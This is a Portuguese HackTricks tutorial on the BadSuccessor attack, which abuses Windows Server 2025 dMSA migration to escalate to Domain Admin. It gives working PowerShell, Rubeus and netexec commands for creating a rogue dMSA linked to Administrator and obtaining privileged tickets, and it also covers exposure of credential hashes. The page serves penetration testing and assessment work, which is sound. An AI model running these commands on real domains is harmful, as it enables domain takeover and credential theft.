BadSuccessor
Tip
Aprenda e pratique AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Aprenda e pratique Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Navegue pelo catálogo completo do HackTricks Training para as trilhas de assessment (ARTA/GRTA/AzRTA) e Linux Hacking Expert (LHE).
Support HackTricks
- Confira os planos de assinatura!
- Junte-se ao 💬 grupo do Discord, ao grupo do telegram, siga @hacktricks_live no X/Twitter, ou confira a página do LinkedIn e o canal do YouTube.
- Compartilhe hacking tricks enviando PRs para os repositórios github HackTricks e HackTricks Cloud.
Visão geral
BadSuccessor abusa do fluxo de migração do delegated Managed Service Account (dMSA) introduzido no Windows Server 2025. Um dMSA pode ser vinculado a uma conta legada por meio de msDS-ManagedAccountPrecededByLink e movido pelos estados de migração armazenados em msDS-DelegatedMSAState. Se um atacante conseguir criar um dMSA em uma OU gravável e controlar esses atributos, o KDC pode emitir tickets para o dMSA controlado pelo atacante com o contexto de autorização da conta vinculada.
Na prática, isso significa que um usuário com poucos privilégios e que só tenha direitos delegados de OU pode criar um novo dMSA, apontá-lo para Administrator, concluir o estado de migração e então obter um TGT cujo PAC contém grupos privilegiados como Domain Admins.
Detalhes de migração do dMSA que importam
- dMSA é um recurso do Windows Server 2025.
Start-ADServiceAccountMigrationdefine a migração para o estado started.Complete-ADServiceAccountMigrationdefine a migração para o estado completed.msDS-DelegatedMSAState = 1significa migração iniciada.msDS-DelegatedMSAState = 2significa migração concluída.- Durante a migração legítima, o dMSA deve substituir a conta superada de forma transparente, então o KDC/LSA preservam o acesso que a conta anterior já tinha.
O Microsoft Learn também observa que, durante a migração, a conta original fica vinculada ao dMSA e o dMSA deve acessar o que a conta antiga podia acessar. Essa é a suposição de segurança que o BadSuccessor abusa.
Requisitos
- Um domínio onde dMSA exists, o que significa que há suporte do Windows Server 2025 do lado do AD.
- O atacante pode create objetos
msDS-DelegatedManagedServiceAccountem alguma OU, ou tem direitos equivalentes e amplos de criação de objetos filho ali. - O atacante pode write os atributos relevantes do dMSA ou controlar totalmente o dMSA que acabou de criar.
- O atacante pode solicitar tickets Kerberos a partir de um contexto ingressado no domínio ou de um túnel que alcance LDAP/Kerberos.
Verificações práticas
O sinal operacional mais limpo é verificar o nível do domínio/forest e confirmar que o ambiente já está usando a nova stack do Server 2025:
Get-ADDomain | Select Name,DomainMode
Get-ADForest | Select Name,ForestMode
Se você vir valores como Windows2025Domain e Windows2025Forest, trate BadSuccessor / dMSA migration abuse como uma verificação prioritária.
Você também pode enumerar OUs graváveis delegadas para criação de dMSA com ferramentas públicas:
.\Get-BadSuccessorOUPermissions.ps1
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor
Fluxo de abuso
- Crie um dMSA em uma OU onde você tenha direitos delegados de create-child.
- Defina
msDS-ManagedAccountPrecededByLinkpara o DN de um alvo privilegiado, comoCN=Administrator,CN=Users,DC=corp,DC=local. - Defina
msDS-DelegatedMSAStatecomo2para marcar a migração como concluída. - Solicite um TGT para o novo dMSA e use o ticket retornado para acessar serviços privilegiados.
Exemplo em PowerShell:
New-ADServiceAccount -Name attacker_dMSA -DNSHostName host.corp.local -Path "OU=Delegated,DC=corp,DC=local"
Set-ADServiceAccount attacker_dMSA -Add @{
msDS-ManagedAccountPrecededByLink="CN=Administrator,CN=Users,DC=corp,DC=local"
}
Set-ADServiceAccount attacker_dMSA -Replace @{msDS-DelegatedMSAState=2}
Exemplos de solicitação de ticket / tooling operacional:
Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/corp.local /dmsa /opsec /nowrap /ptt /ticket:<machine_tgt>
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor -o TARGET_OU='OU=Delegated,DC=corp,DC=local' DMSA_NAME=attacker TARGET_ACCOUNT=Administrator
Por que isso é mais do que privilege escalation
Durante uma migração legítima, o Windows também precisa que a nova dMSA lide com tickets que foram emitidos para a conta anterior antes da troca. É por isso que o material de ticket relacionado a dMSA pode incluir chaves atuais e anteriores no fluxo KERB-DMSA-KEY-PACKAGE.
Para uma migração falsa controlada por um atacante, esse comportamento pode transformar BadSuccessor em:
- Privilege escalation ao herdar SIDs de grupos privilegiados no PAC.
- Credential material exposure porque o tratamento da chave anterior pode expor material equivalente ao RC4/NT hash do predecessor em workflows vulneráveis.
Isso torna a técnica útil tanto para takeover direto do domínio quanto para operações subsequentes, como pass-the-hash ou comprometimento mais amplo de credenciais.
Notes on patch status
O comportamento original do BadSuccessor não é apenas um issue teórico de preview de 2025. A Microsoft atribuiu CVE-2025-53779 e publicou uma atualização de segurança em agosto de 2025. Mantenha este ataque documentado para:
- labs / CTFs / exercícios de assume-breach
- ambientes Windows Server 2025 sem patch
- validação de delegações de OU e exposição de dMSA durante assessments
Não presuma que um domínio Windows Server 2025 seja vulnerável só porque dMSA existe; verifique o nível de patch e teste com cuidado.
Tools
References
- HTB: Eighteen
- Akamai - BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory
- Microsoft Learn - Delegated Managed Service Accounts overview
- Microsoft Security Response Center - CVE-2025-53779
Tip
Aprenda e pratique AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Aprenda e pratique Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Navegue pelo catálogo completo do HackTricks Training para as trilhas de assessment (ARTA/GRTA/AzRTA) e Linux Hacking Expert (LHE).
Support HackTricks
- Confira os planos de assinatura!
- Junte-se ao 💬 grupo do Discord, ao grupo do telegram, siga @hacktricks_live no X/Twitter, ou confira a página do LinkedIn e o canal do YouTube.
- Compartilhe hacking tricks enviando PRs para os repositórios github HackTricks e HackTricks Cloud.


